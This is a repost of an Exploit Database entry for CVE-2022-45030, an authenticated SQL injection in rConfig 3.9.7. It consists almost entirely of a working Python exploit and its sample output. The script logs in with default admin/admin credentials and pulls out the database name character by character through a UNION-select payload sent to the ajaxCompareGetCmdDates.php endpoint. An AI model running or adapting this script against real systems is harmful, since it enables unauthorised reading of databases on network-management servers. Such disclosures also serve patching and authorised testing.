rconfig 3.9.7 – Sql Injection (Authenticated)

• Exploit Database
• 16 阅读

• 作者： azhen
  日期： 2023-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51163/

• # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)
  # Exploit Author: azhen
  # Date: 10/12/2022
  # Vendor Homepage: https://www.rconfig.com/
  # Software Link: https://www.rconfig.com/
  # Vendor: rConfig
  # Version: <= v3.9.7
  # Tested against Server Host: Linux
  # CVE: CVE-2022-45030
  
  import requests
  import sys
  import urllib3
  urllib3.disable_warnings()
  
  s = requests.Session()
  
  # sys.argv.append("192.168.10.150") #Enter the hostname
  
  if len(sys.argv) != 2:
  print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
  sys.exit(1)
  
  host=sys.argv[1] #Enter the hostname
  
  
  def get_data(host):
  print("[+] Get db data...")
  vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
  
  query_exp = "database()"
  result_data = ""
  
  for i in range(1, 100):
  burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
  res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
  # print(res.text)
  
  a = chr(int(res.text[6:10]) - 1000)
  
  if a == '\x00':
  break
  
  result_data += a
  
  print(result_data)
  
  print("[+] Database name: {}".format(result_data))
  
  '''
  output:
  [+] Logging in...
  [+] Get db data...
  r
  rc
  rco
  rcon
  rconf
  rconfi
  rconfig
  rconfigd
  rconfigdb
  [+] Database name: rconfigdb
  '''
  
  
  def login(host):
  print("[+] Logging in...")
  url = "https://"+host+":443/lib/crud/userprocess.php"
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
  
  data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
  response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
  get_data(host)
  
  login(host)